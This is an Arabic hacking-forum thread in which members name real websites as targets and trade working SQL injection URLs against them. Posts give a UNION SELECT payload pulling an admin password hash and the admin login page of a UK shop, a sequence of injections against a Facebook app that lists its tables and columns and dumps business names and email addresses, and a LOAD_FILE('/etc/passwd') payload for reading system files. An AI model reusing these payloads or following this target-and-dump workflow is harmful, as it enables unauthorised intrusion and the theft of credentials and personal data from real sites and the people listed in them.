غرفة حقن قواعد البيانات {غرفة Sql }

[عبد الله ر]

ترجع بالسلامة اخي ماستر

تفضلوا الهدف الجديد
http://www.shrinkingvioletonline.co.uk/product_desc.php?id=2366
الموقع سهل جدا بس بدو شوي
والله شكلو موقع هدايا او بيع ملابس مت بعرف هههه
يلا منتظرالنتائج

 

[Master vbspiders]

[align=center]منور حبيبي ...
ممممم الموقع يعني مش صعب بس الاعمدة شوي كثيرة
تم تخمين عمود الباس :

http://www.shrinkingvioletonline.co.uk/product_desc.php?id=-2366+union+select+admin_password,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+admin--

الباس مشفر : f445370c6accd90b0cd4243d478095e7

مممم انا ما قدرت اخمن غير جدول الباس ولوحة التحكم :

http://www.shrinkingvioletonline.co.uk/admin1/login.php

الباقي عليكم
بالتوفيق
تحياتي



[/align]

 

[medoo_mohamed]

قد استطعت استخراج الباص اما اليوزر فلم اجد عمود اليوزر بعد التخمين

وهذه هى الحقنة

http://www.shrinkingvioletonline.co.uk/product_desc.php?id=-2366 UNION SELECT 1,2,3,4,admin_password,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+admin--

 

[Master vbspiders]

[align=center]ملاحضة حول موقع الاخ عبدالله ر
لما بتصل لتخمين جدول اليوزر لا تبحث بالتخمينات عن هيك اسماء
user , username & etc
لان لوحة الدخول تطلب ايميل الادمن عند تسجيل الدخول وانا ايضا كنت اشك في عدم وجود اي جدول لليوزر
ابدا التخمين من جديد وابحث عن جدول الايميلات
بالتوفيق
تحياتي

[/align]

 

[darkman.dz]

السلام عليكم ورحمة الله تعالى وبركاته

 

[darkman.dz]

هل سبق وواجه أحد منكم موقع به 276 فاعدة بيانات متصلة ببعضها
و فيه 11 عمود باسوورد مختلف !!!!!!!!!!!!!!!
أعتقد أن الحظ إبتسم لي + الموقع موقع شوبينق shopping
ههههههههههههههههههههههههههههههههههههههههههههههههههههههه
لكن راح أحطو لكم بعد الإنتهاء من فحصه كاملا

 

[d4rK-h4ck3r]

اول موقع احطه فيه بعض الصعوبة
http://energychoices.com/page_news_fullpage.php?id=1048

 

[d4rK-h4ck3r]

من يقدر على هدا
http://apps.facebook.com/myhotdeals/promo.php?promoid=150'
تصدق ان الجداول تتغير كل ثانية لول

 

[king dragons]

[align=center]
السلام عليكم

هلا بيكم

ثغرة الــ facebook

صورة للحقنة

الاستغلال


لازم اتحطو اخر الحقنة --


http://apps.facebook.com/myhotdeals/promo.php?promoid=150+AND+1=2+UnIoN+aLL+SeLeCt+1,2,3,4,5,version%28%29,user%28%29,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32----




http://apps.facebook.com/myhotdeals/promo.php?promoid=150+AND+1=2+UnIoN+aLL+SeLeCt+1,2,3,4,5,group_concat%28table_name,0x3a,column_name,0x3a,table_schema%29,7,8,9,10,11,12,13,group_concat%28table_name,0x3a,column_name,0x3a,table_schema%29,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+information_schema.columns+where+column_name+LIKE+char%2837,%20112,%2097,%20115,%20115,%2037%29----


http://apps.facebook.com/myhotdeals... 117, 115, 101, 114, 110, 97, 109, 101, 37)--)--
[/align]

الي يعرف ايكمل مايبخل علينا ​

 

[mouadh kouki]

mercciiiiiiiiiiiiiiii

 

[kanvi]

[align=center]
السلام عليكم

هلا بيكم

ثغرة الــ facebook

صورة للحقنة

الاستغلال


لازم اتحطو اخر الحقنة --


http://apps.facebook.com/myhotdeals/promo.php?promoid=150+AND+1=2+UnIoN+aLL+SeLeCt+1,2,3,4,5,version%28%29,user%28%29,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32----




http://apps.facebook.com/myhotdeals/promo.php?promoid=150+AND+1=2+UnIoN+aLL+SeLeCt+1,2,3,4,5,group_concat%28table_name,0x3a,column_name,0x3a,table_schema%29,7,8,9,10,11,12,13,group_concat%28table_name,0x3a,column_name,0x3a,table_schema%29,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+information_schema.columns+where+column_name+LIKE+char%2837,%20112,%2097,%20115,%20115,%2037%29----


http://apps.facebook.com/myhotdeals/promo.php?promoid=150+AND+1=2+UnIoN+aLL+SeLeCt+1,2,3,4,5,group_concat(table_name,0x3a,column_name,0x3a,table_schema),7,8,9,10,11,12,13,group_concat(table_name,0x3a,column_name,0x3a,table_schema),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+information_schema.columns+where+column_name+LIKE+CHAR(37,%20117,%20115,%20101,%20114,%20110,%2097,%20109,%20101,%2037)--)--
[/align]

الي يعرف ايكمل مايبخل علينا ​

شكرا لك اخي وهذا متوصلت اليه :
معلمومات على الموقع:

http://apps.facebook.com/myhotdeals/promo.php?promoid=150+AND+1=2+UnIoN+aLL+SeLeCt+1,2,3,4,5,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32--

root@localhost : facebook : 5.1.37-1ubuntu5.4

LIST TABLES

http://apps.facebook.com/myhotdeals/promo.php?promoid=150+AND+1=2+UnIoN+aLL+SeLeCt+1,2,3,4,5,group_concat(table_schema,0x3a,table_name),7,8,9,10,11,12,13,group_concat(table_schema,0x3a,table_name),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+FROM+information_schema.tables+WHERE+table_schema+!= 0x6d7973716c+AND+table_schema+!=+0x696e666f726d6174696f6e5f736368656d61--

facebook:accommodation,
        facebook:addcode,
        facebook:adventplace,
        facebook:answers,
        facebook:bookings,
        facebook:bulletin,
        facebook:cat_child,
        facebook:categories,
        facebook:collage,
        facebook:collagealbums,
        facebook:country,
        facebook:edm,
        facebook:eventboard,
        facebook:eventbuddies,
        facebook:eventcomments,
        facebook:eventcomments1,facebook:eventmonth,
        facebook:fbstream,
        facebook:forums,
        facebook:forums1,
        facebook:friends,
        facebook:friends2,
        facebook:funquiz,
        facebook:gb_checkins,
        facebook:guestbook,
        facebook:hotstickers,
        facebook:hotstickers1,
        facebook:isocode,
        facebook:location,
        facebook:loungebuddies,
        facebook:market_alerts,
        facebook:marketplace,
        facebook:mylounge,
        facebook:mymap,
        facebook:mystickers,
        facebook:mytasks,
        facebook:parentevent,
        facebook:photocache,
        facebook:place,
        facebook:place1,
        facebook:placeboard,
        facebook:placeboardusers,
        facebook:poll_cache,
        facebook:poll_groups,
        facebook:poll_options,
        facebook:poll_options1,
        facebook:poll_profile,
        facebook:poll_users,
        facebook:polls,
        facebook:polls1,
        facebook:popularplace,
        facebook:post_photos,
        facebook:postca

LIST COLUMNS

http://apps.facebook.com/myhotdeals/promo.php?promoid=150+AND+1=2+UnIoN+aLL+SeLeCt+1,2,3,4,5,group_concat(table_schema,0x3a,table_name,0x3a,column_name),7,8,9,10,11,12,13,group_concat(table_schema,0x3a,table_name,0x3a,column_name),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+FROM+information_schema.columns+WHERE+table_schema+!= 0x6d7973716c+AND+table_schema+!=+0x696e666f726d6174696f6e5f736368656d61--

facebook:accommodation:id,
        facebook:accommodation:name,
        facebook:accommodation:url,
        facebook:accommodation:locationId,
        facebook:accommodation:a_lat,
        facebook:accommodation:a_long,
        facebook:accommodation:type,
        facebook:accommodation:value,
        facebook:accommodation:valueCount,
        facebook:accommodation:description,
        facebook:accommodation:currency,
        facebook:accommodation:price_min,
        facebook:accommodation:price_max,
        facebook:accommodation:standard_price_min,
        facebook:accommodation:standard_price_max,
        facebook:accommodation:address,
        facebook:accommodation:email,
        facebook:accommodation:img_url,
        facebook:accommodation:def_img,
        facebook:accommodation:saved,
        facebook:addcode:tbid,
        facebook:addcode:userid,
        facebook:addcode:code,
        facebook:addcode:app,
        facebook:addcode:install,
        facebook:addcode:timestamp,
        facebook:addcode:lastlogin,f
        acebook:adventplace:placeid,
        facebook:adventplace:adventplaceid,
        facebook:adventplace:total,
        facebook:answers:seq,f
        acebook:answers:uid,
        facebook:answers:qid,
        facebook:answers:ans,
        facebook:answers:seconds,
        facebook:answers:points

هذه الحقنة النهائية :

http://apps.facebook.com/myhotdeals/promo.php?promoid=150+AND+1=2+UnIoN+aLL+SeLeCt+1,2,3,4,5,6,7,8,9,10,11,12,13,group_concat(id,0x3a,name,0x3a,email),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+accommodation--

1:Cheriton House:info@cheritonhouse.co.uk,
        20997:Highways House:reservations@highwayshouse.co.uk,
        5:B&B San Benedetto:info@bb-sanbenedetto.it,
        13:HOTEL DELL'ARTE:HotelArte@hotmail.it,
        35:Hotel Meridiana:albergo.meridiana@tiscali.it,
        39:Agriturismo Ardene:info@agriturismoardene.it,
        41:Alexander Bed&Breakfast:info@alexanderbb.it,
        48:Casavacanza Vaticano:info@casavacanzavaticano.it,
        50:Alla Settima Luna:,
        60:Maison Genevois 3:info@maisongenevois3.com,
        61:Caterina a San Pietro B&B:,
        77:Gladiator Rooms:,
        80:B&B Svevo e Joyce:svevo.joyce@libero.it,
        82:The Paggino farm holidays:paggino@tuscanyexperience.net,
        95:Suite Manzoni:info@suitemanzoni.it,
        102:La Canonica di Fungaia:claudianatalucci@tiscali.it,
        105:Hotel Milazzo Roma:info@hotelmilazzo.com,
        118:Agriturismo Allevamento Renaccino:allevamentorenaccino@yahoo.it,
        120:B&B Campo de' Fiori:info@bbcampodefiori.com,125:Agriturismo Marciano:staff@agriturismomarciano.it,
        136:BUENAVISTA:info@buenavista-bandb.it,
        146:Borgo di Torri:,152:IDEAL:info@idealbandb.com,
        156:Ricordi di Roma:info@ricord

وهذا
magic_ qiotes

http://apps.facebook.com/myhotdeals/promo.php?promoid=150+AND+1=2+UnIoN+aLL+SeLeCt+1,2,3,4,5,LOAD_FILE('/etc/passwd'),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32--

 

[Master vbspiders]

السلام عليكم ورحمة الله تعالى وبركاته

[align=center]عدنااااااااا
الرحلة اتلغت باقي معاكم طوال شهر رمضان الكريم
وعليكم السلام ورحمة الله وبركاته
منور حبيبي
[/align]

 

[Master vbspiders]

هل سبق وواجه أحد منكم موقع به 276 فاعدة بيانات متصلة ببعضها
و فيه 11 عمود باسوورد مختلف !!!!!!!!!!!!!!!
أعتقد أن الحظ إبتسم لي + الموقع موقع شوبينق shopping
ههههههههههههههههههههههههههههههههههههههههههههههههههههههه
لكن راح أحطو لكم بعد الإنتهاء من فحصه كاملا

[align=center]ممممم انت متاكد انو موقع عادي مش هوست ؟
بعد ما تفحصو ونحن نكمل حقن الاهداف الجديدة انت قم بوضعو...
شكلو هدف نااار
تحياتي[/align]

 

[Master vbspiders]

[align=center]
d4rK-h4ck3r
شكرا على الاهداف اخي الكريم...
king dragons
نورت الغرفة شغل حلو واصل
kanvi
بارك الله فيك اخي الغالي على الحقنة الكاملة تم التقييم
تحياتي


[/align]

 

[kanvi]

[align=center]
d4rK-h4ck3r
شكرا على الاهداف اخي الكريم...
king dragons
نورت الغرفة شغل حلو واصل
kanvi
بارك الله فيك اخي الغالي على الحقنة الكاملة تم التقييم
تحياتي


[/align]

شكرا لترحيبكم بي انت وجميع الاخوة في هذا الموضوع

 

[TIKTAKram]

Back

عودة من جديد

هل من أهداف ؟ أو أضع لكم ؟​

 

[darkman.dz]

السلام عليكم
هل من مواقع لتسخين اليدين
هههههههههههههههههههههه

 

[darkman.dz]

[align=center]ممممم انت متاكد انو موقع عادي مش هوست ؟
بعد ما تفحصو ونحن نكمل حقن الاهداف الجديدة انت قم بوضعو...
شكلو هدف نااار
تحياتي[/align]

ما هو الفرق بين الموقع والهوست أنا أعتقد حسب علمي أن الهوست هو المضيف يعني ممكن أجد root هل هذا ماقصدت ؟؟
أنا حسب علمي المواقع التجارية معظمها مركب على سيرفرات خاصة وتقريبا تكون وحيدة على السيرفر لتجنب الإنتقال عبر المواقع المصابة و الوصول إليها

 

[Master vbspiders]

ما هو الفرق بين الموقع والهوست أنا أعتقد حسب علمي أن الهوست هو المضيف يعني ممكن أجد root هل هذا ماقصدت ؟؟
أنا حسب علمي المواقع التجارية معظمها مركب على سيرفرات خاصة وتقريبا تكون وحيدة على السيرفر لتجنب الإنتقال عبر المواقع المصابة و الوصول إليها

[align=center]ممم بالنسبة للهوست
كلامك سليم لكن...
احيانا الاستضافة تعمل باك اب لقواعد البيانات الخاصة بالمواقع الي موجودة على السيرفر الخاص فيها
ولذلك ممكن تلقي قواعد بيانات متعددة وهيك
اما بالنسبة للمواقع التجارية فلا اعلم عنها شي
عموما انت قم بطرح الموقع وانشاء الله بنقدر نحقنو
تحياتي لك[/align]

 

[darkman.dz]

ok
لكن قبل كل شيئ هذا موقع
أنا تأكدتمن أنه مصاب وكذلك وجدت أن عدد الأعمدة 9
لكن لم أجد الأعمدة المصابة
أعتقد أنها في ال source الخاص بالصفحة
و أنا لا أحب أبدا البحث فيه
لذلك سأهديه لكم
وها هو

http://www.pixheaven.net